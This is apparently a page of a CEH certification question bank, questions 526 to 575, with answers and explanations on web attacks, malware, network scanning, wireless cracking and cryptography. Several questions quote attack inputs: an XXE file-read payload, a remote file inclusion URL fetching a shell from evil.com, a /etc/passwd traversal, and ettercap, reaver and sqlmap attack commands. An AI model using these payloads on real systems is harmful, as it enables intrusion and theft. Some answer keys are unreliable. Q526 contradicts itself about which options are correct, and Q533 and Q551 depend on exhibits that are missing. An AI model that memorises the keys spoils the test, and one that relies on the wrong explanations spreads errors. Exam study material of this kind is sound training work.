Certified Ethical Hacker CEH (CEH) — Questions 526600

1010 questions total · 14pages · All types, answers revealed

Page 7

Page 8 of 14

Page 9
526
Multi-Selecthard

Which THREE of the following are components of the CHPSET system hacking methodology?

Select 3 answers
A.Port scanning
B.Vulnerability scanning
C.Cracking passwords
D.Privilege escalation
E.Erasing tracks
AnswersC, D, E

Cracking is the first step.

Why this answer

Options A, B, and E are correct. CHPSET stands for Cracking passwords, Hiding files, Privilege escalation, Executing applications, Spying, and Erasing tracks.

527
MCQhard

A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

A.SameSite=Strict
B.HTTPOnly flag
C.Secure flag
D.CSRF token
AnswerD

A CSRF token would prevent the attack because the malicious site cannot guess the token.

Why this answer

The presence of a SameSite cookie set to Lax does not prevent CSRF for state-changing requests like password change if the attack uses a GET or POST from a top-level navigation. However, the primary missing mitigation is a CSRF token, which is a unique unpredictable value tied to the session and validated by the server.

528
Multi-Selectmedium

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?

Select 2 answers
A.Disable unnecessary URL schemas (e.g., file://, dict://)
B.Use a blacklist to block private IP ranges
C.Increase the timeout for HTTP requests
D.Implement an allowlist of permitted URLs or IP addresses
E.Encode user input in base64 before passing to URL functions
AnswersA, D

Disabling unused schemas limits the protocols an attacker can abuse.

Why this answer

Whitelisting allowed domains prevents requests to arbitrary targets. Disabling unused URL schemas (e.g., file://) reduces attack surface. Input validation alone is insufficient.

529
MCQeasy

An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?

A.UDP flood
B.Smurf attack
C.SYN flood
D.DNS amplification
AnswerD

Uses open DNS resolvers to amplify traffic to the victim.

Why this answer

This is a DNS amplification attack, a type of volumetric DDoS where small queries generate large responses, amplified by the number of resolvers.

530
Multi-Selectmedium

Which TWO of the following are common techniques for covering tracks after compromising a system? (Select 2)

Select 2 answers
A.Increasing the frequency of password changes
B.Enabling verbose logging for future attacks
C.Manipulating event logs to remove evidence of intrusion
D.Using steganography to hide exfiltrated data in image files
E.Setting up a honeypot to distract defenders
AnswersC, D

Attackers often clear or modify logs to hide their activities.

Why this answer

Log manipulation (clearing or altering logs) and using steganography (hiding data in plain sight) are common cover-tracks techniques. Deletion of logs is also common, but manipulation is more specific.

531
MCQmedium

An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?

A.All HTTP traffic on the network
B.HTTP traffic to and from 10.0.0.5
C.Only HTTP traffic originating from 10.0.0.5
D.All traffic from 10.0.0.5 on any port
AnswerB

The capture includes both directions (to and from) on port 80 for that host.

Why this answer

The filter 'host 10.0.0.5 and port 80' captures traffic to/from the host on port 80 only. It does not specify direction, so both inbound and outbound HTTP traffic (TCP port 80) from that host is captured.

532
MCQhard

A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?

A.Worm
B.Keylogger
C.Backdoor Trojan
D.Ransomware
AnswerC

A backdoor Trojan allows remote access and execution of commands. The combination of a suspicious port and 'cmd.exe /c' indicates a remote shell.

Why this answer

Port 4444 is commonly associated with Metasploit's default reverse shell payload. The presence of 'cmd.exe /c' and an IP address indicates a backdoor that provides remote command execution, which is a Trojan backdoor or RAT.

533
MCQeasy

What can be inferred from the output?

A.The domain has two mail servers with different priority levels.
B.The command failed because the DNS server is unreachable.
C.The domain uses SPF records to prevent email spoofing.
D.The domain's web server IP address is 192.168.1.1.
AnswerA

MX records with preferences 10 and 20 indicate two mail servers.

Why this answer

The output shows two MX records for the domain, each with a different priority value (e.g., 10 and 20). Lower priority numbers indicate higher preference, so the mail server with priority 10 is tried first, and the one with priority 20 is a backup. This directly indicates the domain has two mail servers with different priority levels, which is exactly what MX records are designed to convey.

Exam trap

The trap here is that candidates may confuse MX records with other DNS record types (like A or TXT) and incorrectly infer unrelated information such as SPF usage or web server IPs, or assume the command failed when it clearly succeeded.

How to eliminate wrong answers

Option B is wrong because the command successfully returned MX records, proving the DNS server is reachable and the query did not fail. Option C is wrong because SPF records are stored as TXT records, not MX records, and the output only shows MX records, so no inference about SPF can be made. Option D is wrong because MX records contain mail server hostnames and their IP addresses are resolved separately via A or AAAA records; the output does not show any web server IP address, and 192.168.1.1 is a private IP that would not appear in public DNS for a domain's web server.

534
MCQhard

During an IoT assessment, a tester examines a smart thermostat that uses the MQTT protocol. The tester finds that the device connects to a broker without any authentication. Which of the following attacks is MOST likely to succeed?

A.Publishing arbitrary messages to control the device and subscribing to data topics
B.Firmware extraction via UART
C.Reversing the firmware to find hardcoded credentials
D.Performing a dictionary attack on the Wi-Fi PSK
AnswerA

Unauthenticated MQTT allows anyone to publish/subscribe, leading to control and data leakage.

Why this answer

Without authentication on MQTT, an attacker can publish malicious commands (e.g., change temperature) and subscribe to all topics to eavesdrop on sensor data.

535
MCQhard

A penetration tester discovers that a cloud application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following is a potential impact of this vulnerability?

A.Cross-site scripting (XSS) in the browser
B.Remote code execution via command injection
C.Access to cloud instance metadata
D.SQL injection in the database
AnswerC

SSRF can be used to query internal metadata services that may contain credentials.

Why this answer

SSRF allows the attacker to make requests from the server, potentially accessing internal services like metadata endpoints (e.g., http://169.254.169.254) that are not publicly accessible.

536
MCQmedium

A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?

A.DNS spoofing
B.ARP poisoning
C.MAC flooding
D.SYN flood
AnswerC

MAC flooding sends many fake MAC addresses to fill the CAM table, causing the switch to flood traffic.

Why this answer

MAC flooding attacks fill the CAM table to force the switch into hub mode for sniffing.

537
MCQmedium

A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?

A.Ransomware
B.Worm
C.Boot sector virus
D.Backdoor Trojan
AnswerD

Backdoor Trojans establish remote access and often communicate with C2 servers.

Why this answer

A backdoor Trojan provides remote access to an attacker, often using encrypted C2 communications. The connections to a C2 domain on port 443 (HTTPS) are indicative of backdoor activity.

538
MCQeasy

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

A.Reflected XSS is a server-side vulnerability, while stored XSS is a client-side vulnerability
B.Reflected XSS is non-persistent and requires user interaction, while stored XSS is persistent and can affect multiple users
C.Reflected XSS only works with HTTP POST requests, while stored XSS works with GET requests
D.Reflected XSS is triggered by the server, while stored XSS is triggered by the client
AnswerB

Reflected XSS does not persist; it appears in the response of a crafted link. Stored XSS remains on the server and infects any user viewing the page.

Why this answer

Reflected XSS is injected via the current request (e.g., URL parameter) and the script reflects immediately in the response. Stored XSS is saved on the server (e.g., in a database) and executed when other users view the affected page.

539
MCQmedium

An analyst observes the following SNMP walk output on a network device: `SNMPv2-SMI::enterprises.9.9.23.1.2.1.1.5.1 = STRING: "cisco"`. Which finding is most significant?

A.The SNMP community string is "cisco" and likely weak
B.The SNMP service is using version 2c
C.The device is running Cisco IOS version 12.0
D.The device is configured for read-write access
AnswerA

Why this answer

The string "cisco" indicates the community string is default or easily guessable. SNMP community strings are used as authentication; public/private defaults are a well-known vulnerability.

540
MCQmedium

A company wants to secure its email communications using digital signatures. Which cryptographic key does the sender use to sign the email?

A.Sender's public key
B.Sender's private key
C.Recipient's private key
D.Recipient's public key
AnswerB

The sender signs with their private key.

Why this answer

Digital signatures use asymmetric cryptography where the sender signs the email with their private key. The recipient then verifies the signature using the sender's public key, ensuring authenticity and non-repudiation. This is defined in standards like S/MIME (RFC 5751) and OpenPGP (RFC 4880).

Exam trap

The trap here is that candidates confuse the roles of keys in encryption vs. signing, often selecting the sender's public key because they associate 'public' with sharing, but signing requires the private key to prove the sender's identity.

How to eliminate wrong answers

Option A is wrong because the sender's public key is used for verification by the recipient, not for signing; signing requires the private key to create a unique digital signature. Option C is wrong because the recipient's private key is used for decrypting messages encrypted with their public key, not for signing the sender's email. Option D is wrong because the recipient's public key is used for encrypting messages to the recipient, not for signing the sender's email.

541
MCQmedium

A security analyst observes repeated attempts to validate user accounts via SMTP using VRFY commands from an external IP. What is the BEST immediate action to mitigate this reconnaissance?

A.Upgrade to the latest version of the SMTP server
B.Enable SMTP authentication for all incoming connections
C.Block the external IP address at the firewall
D.Disable VRFY and EXPN commands in the SMTP server configuration
AnswerD

This prevents the enumeration technique entirely.

Why this answer

The VRFY command is an SMTP protocol feature (RFC 821) that allows a client to verify whether a specific email address exists on the server. Attackers use VRFY and EXPN to enumerate valid user accounts during the reconnaissance phase. Disabling these commands in the SMTP server configuration directly stops this enumeration technique without affecting legitimate mail delivery.

Exam trap

The trap here is that candidates often choose to block the IP address (Option C) as a quick fix, failing to recognize that the root cause is the enabled VRFY/EXPN commands, which must be disabled at the server configuration level for a permanent mitigation.

How to eliminate wrong answers

Option A is wrong because upgrading the SMTP server version does not disable VRFY/EXPN by default; the commands remain functional unless explicitly configured otherwise. Option B is wrong because SMTP authentication applies to mail submission (port 587) or after the initial connection, but VRFY is typically processed before authentication, so enabling auth does not block unauthenticated VRFY queries. Option C is wrong because blocking a single external IP is a temporary, reactive measure; the attacker can easily switch IPs, and the underlying vulnerability (enabled VRFY/EXPN) remains unaddressed.

542
MCQhard

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

A.XML External Entity (XXE) injection
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.Command injection
AnswerA

The DOCTYPE declaration with an external entity reading a file is classic XXE.

Why this answer

This is an XML External Entity (XXE) injection attack, where an external entity is defined to read local files.

543
MCQmedium

A penetration tester is conducting a vulnerability scan against a target network. Which of the following tools is BEST suited for this task?

A.Nessus
B.Nmap
C.Wireshark
D.Metasploit
AnswerA

Nessus is a comprehensive vulnerability scanner that checks for thousands of vulnerabilities.

Why this answer

Nessus is a dedicated vulnerability scanner that automates the process of identifying known vulnerabilities, misconfigurations, and missing patches across a target network. It uses a large plugin database (e.g., NASL scripts) to perform non-intrusive checks against services and operating systems, making it the best tool for a vulnerability scan. Unlike general-purpose tools, Nessus is specifically designed to correlate scan results with CVE entries and provide risk ratings, which is the core requirement of a vulnerability assessment.

Exam trap

The trap here is that candidates confuse network scanning (Nmap) with vulnerability scanning (Nessus), assuming that any tool that discovers open ports can also assess vulnerabilities, but CEH distinguishes between reconnaissance tools and dedicated vulnerability assessment tools.

How to eliminate wrong answers

Option B (Nmap) is wrong because Nmap is a network mapper and port scanner, not a vulnerability scanner; while it can detect open ports and services via scripts (NSE), it lacks a comprehensive vulnerability database and automated plugin-based assessment. Option C (Wireshark) is wrong because Wireshark is a packet analyzer used for deep inspection of network traffic, not for scanning systems for vulnerabilities; it captures and dissects packets but does not perform active vulnerability checks. Option D (Metasploit) is wrong because Metasploit is an exploitation framework designed to verify and exploit vulnerabilities after they are identified, not to conduct a broad vulnerability scan; using it for scanning would be inefficient and potentially destructive without prior assessment.

544
MCQmedium

A security analyst notices a significant increase in outbound traffic from an internal server to multiple external IPs on port 443. The server is not a web server and should not be initiating such connections. Which type of malware is MOST likely causing this behavior?

A.A boot sector virus
B.A backdoor Trojan
C.A fileless virus
D.A worm
AnswerB

Backdoors provide remote access and often communicate with C2 servers over encrypted channels like HTTPS.

Why this answer

A backdoor Trojan allows an attacker to remotely control the infected system. The outbound connections are likely command-and-control traffic over HTTPS to hide from network monitoring.

545
MCQhard

A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?

A.Nmap
B.tcpdump
C.Wireshark
D.Ettercap
AnswerD

Ettercap specializes in ARP poisoning and MITM attacks.

Why this answer

Ettercap is a well-known tool for ARP poisoning attacks. ARP spoofing involves sending fake ARP replies to associate the attacker's MAC with the gateway's IP.

546
MCQmedium

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

A.DOM-based XSS
B.Reflected XSS
C.Self-XSS
D.Stored XSS
AnswerD

The comment is stored and executed for all users.

Why this answer

The comment is stored on the server and executed when other users view the page, which is the definition of stored (persistent) XSS.

547
MCQeasy

Which of the following is a hashing algorithm that produces a 160-bit (20-byte) hash value?

A.MD5
B.SHA-256
C.SHA-1
D.SHA-512
AnswerC

SHA-1 produces a 160-bit hash.

Why this answer

SHA-1 produces a 160-bit hash. MD5 produces 128 bits, SHA-256 produces 256 bits, and SHA-512 produces 512 bits.

548
MCQeasy

Which cryptographic algorithm is classified as symmetric and uses a block cipher with a fixed block size of 128 bits, supporting key sizes of 128, 192, and 256 bits?

A.RC4
B.3DES
C.AES
D.RSA
AnswerC

Correct. AES is a symmetric block cipher with 128-bit blocks and variable key sizes.

Why this answer

AES is a symmetric block cipher with a block size of 128 bits and supports key sizes of 128, 192, and 256 bits. It is the most widely used symmetric encryption standard.

549
MCQmedium

A security analyst captures a WPA2 4-way handshake using airodump-ng. To crack the PSK, which tool would they MOST likely use next?

A.Kismet
B.Aircrack-ng
C.John the Ripper
D.Reaver
AnswerB

Aircrack-ng is the standard tool for performing dictionary attacks on captured WPA2 handshakes.

Why this answer

The correct tool for cracking a WPA2 PSK from a captured handshake is aircrack-ng, which performs dictionary attacks against the handshake file.

550
MCQhard

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

A.Out-of-band SQL injection
B.Blind SQL injection
C.Time-based SQL injection
D.In-band SQL injection
AnswerD

By default, SQLMap uses in-band (UNION and error-based) techniques.

Why this answer

Without specifying a technique, SQLMap defaults to using in-band (UNION) and error-based techniques, which are all in-band.

551
MCQeasy

Refer to the exhibit. A penetration tester runs the above Nmap scan. Which of the following statements is most accurate regarding the state of port 3389?

A.Port 3389 is open and running a Remote Desktop service, but the service version could not be identified.
B.Port 3389 is closed and the target is ignoring the probe.
C.The target is likely a honeypot designed to simulate a Windows machine.
D.A firewall is likely blocking the scan probes to port 3389, preventing Nmap from determining whether the port is open.
AnswerD

The 'filtered' state means Nmap could not determine if the port is open or closed, usually due to packet filtering.

Why this answer

The Nmap scan output shows port 3389 in a 'filtered' state, which means Nmap received no response or an ICMP unreachable error from the target. This typically indicates a firewall is blocking the probes, preventing Nmap from determining whether the port is actually open or closed. A filtered state does not confirm the port is open or closed, only that access is being obstructed.

Exam trap

The trap here is that candidates confuse 'filtered' with 'closed' or 'open', failing to recognize that Nmap's port states (open, closed, filtered) have distinct meanings based on the type of response received, and that a firewall can cause a filtered state without revealing whether the service is actually running.

How to eliminate wrong answers

Option A is wrong because Nmap reports port 3389 as 'filtered', not 'open', so it cannot confirm the service is running or identify its version. Option B is wrong because a 'closed' port would return a TCP RST packet, not the lack of response or ICMP unreachable that defines the 'filtered' state. Option C is wrong because a honeypot would typically respond to probes to simulate a service, not remain silent or return ICMP unreachables; the 'filtered' state does not indicate deception, only network-level filtering.

552
MCQmedium

A penetration tester uses a tool to perform ARP poisoning and then launches a man-in-the-middle attack. The tool also allows session hijacking and sniffing. Which of the following tools is being used?

A.Wireshark
B.tcpdump
C.Ettercap
D.Nmap
AnswerC

Ettercap supports ARP poisoning, MITM, and sniffing.

Why this answer

Ettercap is a comprehensive tool for ARP poisoning, MITM attacks, session hijacking, and sniffing.

553
MCQeasy

A cloud security engineer wants to ensure that only authorized users can access an S3 bucket containing sensitive data. Which AWS service should be used to enforce fine-grained access control?

A.AWS Key Management Service (KMS)
B.AWS CloudTrail
C.AWS CloudFront
D.AWS Identity and Access Management (IAM)
AnswerD

IAM policies define permissions for users and roles.

Why this answer

AWS Identity and Access Management (IAM) is the correct service because it allows the cloud security engineer to define fine-grained permissions using IAM policies that specify which users, groups, or roles can perform specific actions (e.g., s3:GetObject, s3:PutObject) on the S3 bucket. IAM integrates directly with S3 to enforce access control based on the principle of least privilege, ensuring only authorized users can access sensitive data.

Exam trap

The trap here is that candidates often confuse encryption services (KMS) or logging services (CloudTrail) with access control, but only IAM provides the fine-grained authorization policies needed to control user actions on S3 resources.

How to eliminate wrong answers

Option A is wrong because AWS Key Management Service (KMS) is used for encryption key management, not for enforcing access control policies; it protects data at rest but does not define who can access the bucket. Option B is wrong because AWS CloudTrail is a logging and monitoring service that records API calls for auditing, not a mechanism to enforce access control decisions. Option C is wrong because AWS CloudFront is a content delivery network (CDN) that can be used to distribute content with signed URLs or cookies, but it does not provide native fine-grained access control to the S3 bucket itself; it is a separate service for caching and delivery, not for authorization management.

554
MCQmedium

A security analyst notices a large number of incomplete TCP connections (SYN_RECV) on a server. Which Nmap scan type is the MOST likely cause of this symptom?

A.SYN scan (-sS)
B.Ping sweep (-sn)
C.TCP Connect scan (-sT)
D.UDP scan (-sU)
AnswerA

SYN scan sends SYN and stops after receiving SYN-ACK, leaving the connection half-open (SYN_RECV).

Why this answer

A SYN scan (-sS) sends a SYN packet to initiate a TCP handshake and, upon receiving a SYN/ACK, sends a RST to tear down the connection before it completes. This leaves the server with half-open connections in the SYN_RECV state because the three-way handshake is never finished. The large number of incomplete connections directly matches the behavior of a SYN scan.

Exam trap

The trap here is that candidates confuse SYN scan with TCP Connect scan, assuming both complete the handshake, but SYN scan deliberately avoids the final ACK to remain stealthy, leaving the connection half-open in SYN_RECV.

How to eliminate wrong answers

Option B (Ping sweep, -sn) is wrong because it only sends ICMP echo requests or TCP/UDP probes to determine if hosts are alive, not to establish TCP connections, so it cannot produce SYN_RECV states. Option C (TCP Connect scan, -sT) is wrong because it completes the full three-way handshake (SYN, SYN/ACK, ACK) and then sends a RST, leaving the connection in ESTABLISHED state only briefly, not in SYN_RECV. Option D (UDP scan, -sU) is wrong because UDP is connectionless and does not use SYN packets or maintain connection states like SYN_RECV.

555
Multi-Selectmedium

An organization is implementing a social engineering defense program. Which TWO measures are most effective in reducing the risk of phishing attacks? (Choose two.)

Select 2 answers
A.Implement strong password policies with multi-factor authentication.
B.Enforce regular software updates and patch management.
C.Conduct regular security awareness training for all employees.
D.Deploy network segmentation and access control lists.
E.Install advanced email filtering and anti-malware solutions.
AnswersC, E

Training helps users identify and report phishing attempts.

Why this answer

Option C is correct because regular security awareness training directly addresses the human factor in phishing attacks. Employees learn to identify suspicious emails, avoid clicking malicious links, and report incidents promptly, which is critical since technical controls alone cannot prevent all phishing attempts. This training reinforces behaviors like verifying sender addresses and not bypassing security protocols, reducing the likelihood of successful social engineering.

Exam trap

The trap here is that candidates often confuse technical controls (like MFA or patching) with social engineering defenses, failing to recognize that phishing primarily exploits human behavior, not system vulnerabilities, so the most effective measures are those that address the human element and the delivery channel (email).

556
MCQeasy

A system administrator receives a phone call from someone claiming to be from IT support, asking for the administrator's password to 'fix a server issue'. This is an example of which social engineering attack?

A.Vishing
B.Baiting
C.Phishing
D.Pretexting
AnswerD

Pretexting uses a fabricated story to gain information.

Why this answer

Pretexting involves creating a fabricated scenario (pretext) to obtain sensitive information, such as a password. The caller pretends to be IT support to trick the victim.

557
MCQmedium

During a penetration test, a security analyst runs the following command on a Linux system: ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//. What is the PRIMARY purpose of this command?

A.To spoof the DNS responses to redirect the target to a malicious site
B.To sniff all traffic on the network by enabling promiscuous mode on the interface
C.To perform a denial-of-service attack by flooding the network with ARP replies
D.To perform a man-in-the-middle attack between the gateway and the target host
AnswerD

The -M arp:remote option enables MITM via ARP poisoning.

Why this answer

The command uses Ettercap with ARP poisoning (arp:remote) to perform a man-in-the-middle attack between the gateway (192.168.1.1) and a target host (192.168.1.100). This allows interception and modification of traffic.

558
MCQmedium

A security analyst runs `ldapsearch -x -h 10.0.0.3 -b "dc=company,dc=com"` and receives a large number of entries including user objects. What type of information is being collected?

A.SMB share listings
B.SNMP MIB values
C.NetBIOS names and MAC addresses
D.Active Directory users and attributes
AnswerD

LDAP queries against domain controllers return AD objects.

Why this answer

LDAP enumeration retrieves directory information, such as user accounts, groups, and other objects from an LDAP server.

559
Multi-Selectmedium

Which TWO of the following are characteristics of a polymorphic virus?

Select 2 answers
A.It changes its code signature each time it infects a new file
B.It spreads via email attachments
C.It uses encryption with a variable key
D.It remains dormant until a specific date or time
E.It can infect the Master Boot Record (MBR)
AnswersA, C

Polymorphic viruses mutate their code to avoid detection.

Why this answer

Option A is correct because a polymorphic virus changes its decryption routine and code signature each time it infects a new file, making signature-based detection difficult. This mutation is achieved by using a polymorphic engine that generates varied decryption loops while preserving the malicious payload.

Exam trap

The trap here is that candidates confuse the method of propagation (e.g., email) or activation trigger (e.g., date) with the core definition of polymorphism, which is solely about code mutation to evade signature detection.

560
MCQmedium

A penetration tester uses the following command to attack a WPS-enabled AP: 'reaver -i mon0 -b 00:11:22:33:44:55 -vv'. What is the primary goal of this attack?

A.Perform a de-authentication attack on all clients
B.Capture a WPA2 4-way handshake for offline cracking
C.Scan for hidden SSIDs in the area
D.Obtain the WPS PIN and subsequently the WPA2 PSK
AnswerD

Reaver brute-forces the WPS PIN to recover the PSK.

Why this answer

Reaver is used to brute force the WPS PIN, recovering the PIN and ultimately the WPA2 PSK.

561
MCQeasy

Which of the following is the primary purpose of using a CSRF token in a web application?

A.Prevent cross-site request forgery
B.Prevent session hijacking
C.Prevent XSS
D.Prevent SQL injection
AnswerA

CSRF tokens specifically prevent CSRF by ensuring request authenticity.

Why this answer

CSRF tokens are unique, unpredictable values embedded in forms or requests that validate the request originated from the legitimate application, preventing cross-site request forgery attacks.

562
MCQmedium

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

A.Set 'AllowOverride None'
B.Set 'ServerSignature Off'
C.Set 'Options -Indexes' in the httpd.conf or .htaccess file
D.Set 'DirectoryIndex disabled'
AnswerC

The Indexes option controls directory listing; removing it disables listing.

Why this answer

Disabling the Indexes option in the Directory directive prevents Apache from listing directory contents when no index file exists.

563
MCQhard

An analyst captures network traffic and sees a large number of packets with source IP 10.0.0.1, destination IP 192.168.1.1, TCP SYN flag set, with sequence numbers that appear incremental. The destination responds with SYN-ACK but the source never completes the handshake. Which attack is MOST likely occurring?

A.ARP poisoning
B.SYN flood
C.ICMP flood
D.DNS amplification
AnswerB

SYN flood uses incomplete TCP handshakes to exhaust resources.

Why this answer

In a TCP SYN flood, the attacker sends many SYN packets with spoofed IPs (or non-responsive IPs) and never completes the handshake, exhausting server resources.

564
MCQmedium

A security team wants to identify all live hosts on a large, Class B private IP network (172.16.0.0/16) as quickly as possible while minimizing network load. Which tool and technique should they use?

A.Masscan with --ping to send ICMP echo requests across the /16 range
B.Use theHarvester to query DNS records for the domain
C.Nmap with -sn (ping sweep) on all 65536 IPs
D.hping3 with --icmp on each IP sequentially
AnswerA

Masscan can send ICMP echo requests at very high rates, making it ideal for fast host discovery on large networks.

Why this answer

Masscan is designed for high-speed scanning and can send ICMP echo requests across a /16 range (65,536 IPs) in seconds, far faster than Nmap or hping3, while its --ping mode minimizes network load by using stateless packet transmission. This makes it the optimal choice for quickly identifying live hosts on a large private network without overwhelming the network.

Exam trap

The trap here is that candidates often assume Nmap's -sn is the fastest option because it is the most commonly used ping sweep tool, but they overlook Masscan's specialized design for ultra-high-speed scanning across large ranges, which is explicitly tested in CEH questions about minimizing time and network load.

How to eliminate wrong answers

Option B is wrong because theHarvester is a tool for gathering email addresses, subdomains, and other OSINT data from public sources like search engines and DNS records, not for performing live host discovery on a private IP range. Option C is wrong because Nmap's -sn ping sweep, while effective, is significantly slower than Masscan on a /16 range due to its stateful scanning approach, which creates more network overhead and takes much longer to complete. Option D is wrong because hping3 with --icmp sends packets sequentially to each IP, which is extremely slow and inefficient for scanning 65,536 hosts, and it does not minimize network load as it requires per-packet state tracking.

565
MCQhard

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

A.Directory traversal
B.Local File Inclusion (LFI)
C.Command injection
D.Remote File Inclusion (RFI)
AnswerD

The payload uses a remote URL, indicating RFI.

Why this answer

Remote File Inclusion (RFI) allows an attacker to include a remote file, often leading to arbitrary code execution if the included file contains PHP or other executable code. The 'file' parameter is used to include a remote resource.

566
MCQhard

An attacker has obtained password hashes from a Windows system. They plan to use rainbow tables to crack them. Which tool would be most appropriate for generating and using rainbow tables?

A.Hashcat
B.Ophcrack
C.John the Ripper
D.RainbowCrack
AnswerD

RainbowCrack is the standard tool for generating and using rainbow tables with time-memory tradeoff.

Why this answer

RainbowCrack is the tool specifically designed for generating and using rainbow tables, which are precomputed hash chains used to reverse cryptographic hash functions. The question explicitly asks for the tool most appropriate for generating and using rainbow tables, and RainbowCrack directly supports both creating rainbow tables (with rtgen) and performing lookups (with rcsort and rcrack).

Exam trap

EC-Council often tests the distinction between tools that crack passwords via brute-force/dictionary (Hashcat, John the Ripper) versus tools that specifically leverage precomputed rainbow tables (RainbowCrack, Ophcrack), and candidates mistakenly choose Hashcat because it is the most popular GPU cracker, ignoring the explicit 'rainbow tables' requirement.

How to eliminate wrong answers

Option A is wrong because Hashcat is a GPU-accelerated password cracker that uses brute-force, dictionary, or rule-based attacks, not rainbow tables; it does not generate or use precomputed rainbow tables. Option B is wrong because Ophcrack is a specialized tool for cracking Windows LM and NTLM hashes using its own precomputed rainbow tables, but it is not designed for generating custom rainbow tables; it relies on tables from the Ophcrack project. Option C is wrong because John the Ripper is a versatile password cracker that supports multiple attack modes (dictionary, brute-force, incremental) but does not natively generate or use rainbow tables; its 'john --format=nt --make-charset' is for Markov mode, not rainbow tables.

567
Multi-Selecthard

Which THREE of the following are types of SQL injection attacks? (Choose 3)

Select 3 answers
A.Out-of-band SQLi (e.g., DNS or HTTP exfiltration)
B.Stored SQLi
C.In-band SQLi (error-based or union-based)
D.Blind (inferential) SQLi (boolean- or time-based)
E.Reflected SQLi
AnswersA, C, D

Out-of-band uses a different channel (e.g., DNS) to receive data.

Why this answer

Out-of-band SQLi (option A) is correct because it uses a different channel (e.g., DNS or HTTP requests) to exfiltrate data when the attacker cannot receive direct responses from the database. This technique is effective when the database server can initiate outbound network connections, allowing data to be sent to an attacker-controlled server via DNS queries or HTTP requests.

Exam trap

EC-Council often tests candidates by mixing SQL injection categories with XSS terminology (stored/reflected) to see if they confuse web attack types; the trap here is that 'stored' and 'reflected' are not SQLi types but XSS variants.

568
MCQeasy

Which type of malware is characterized by its ability to spread without requiring a host file and can replicate across networks automatically?

A.Virus
B.Trojan
C.Worm
D.Ransomware
AnswerC

A worm is a standalone program that self-replicates and spreads across networks.

Why this answer

A worm is a standalone malware that self-replicates and spreads across networks, unlike viruses that require a host file.

569
MCQmedium

An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?

A.Directory traversal
B.SSRF
C.LFI
D.Command injection
AnswerA

The use of '../' to access files outside the web root is directory traversal.

Why this answer

The log shows a request attempting to traverse directories using '../' to access a sensitive system file (/etc/passwd), which is directory traversal.

570
Multi-Selectmedium

A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?

Select 2 answers
A.Burp Suite
B.SQLMap
C.OWASP ZAP
D.Nikto
E.Nmap
AnswersA, B

Burp Suite's Repeater and Intruder are excellent for manual SQLi testing.

Why this answer

Burp Suite allows manual intercept and modification of requests to inject SQL payloads. SQLMap automates SQL injection detection and exploitation. Nikto is a web server scanner, not specific to SQLi.

Nmap is a network scanner. OWASP ZAP is a web app scanner similar to Burp but less manual.

571
Multi-Selecteasy

Which TWO of the following are characteristics of stored (persistent) XSS?

Select 2 answers
A.The attack requires the victim to click a crafted link
B.The payload is reflected immediately in the response
C.The malicious script is stored on the server (e.g., in a database)
D.The attack only works if the victim is logged in
E.The attack can affect multiple users without direct interaction
AnswersC, E

Stored XSS persists on the server.

Why this answer

Stored XSS involves malicious script being permanently stored on the server and executed whenever the stored content is accessed. It does not require a crafted link, and it can affect multiple users.

572
Matchingmedium

Match each network protocol to its well-known port number.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

22

443

53

25

3389

Why these pairings

These are standard well-known port assignments as defined by IANA.

573
Multi-Selecthard

Which THREE of the following are methods attackers use to cover their tracks after compromising a system?

Select 3 answers
A.Modifying file timestamps
B.Deleting event logs
C.Installing a rootkit
D.Performing a dictionary attack
E.Running a vulnerability scanner
AnswersA, B, C

Timestamp manipulation hides forensic artifacts.

Why this answer

Modifying file timestamps (A) is a common anti-forensic technique used to hide the evidence of file creation, modification, or access. Attackers use tools like `touch` on Linux or `SetFileTime` on Windows to alter the MAC (Modify, Access, Change) timestamps, making malicious files appear as legitimate system files. This prevents forensic investigators from identifying when the compromise occurred or which files were altered.

Exam trap

EC-Council often tests the distinction between attack phases, so candidates mistakenly associate dictionary attacks and vulnerability scanning with post-exploitation activities, when they actually belong to the enumeration and system hacking phases, not the covering tracks phase.

574
MCQeasy

Which enumeration technique would be MOST effective for gathering usernames from an SMTP server that supports the VRFY command?

A.SNMP enumeration using SNMPwalk
B.SMTP VRFY enumeration
C.NetBIOS enumeration using nbtstat
D.LDAP anonymous queries
AnswerB

VRFY verifies usernames directly.

Why this answer

The VRFY command asks the server to verify a username. Attackers can use it to enumerate valid accounts.

575
Multi-Selectmedium

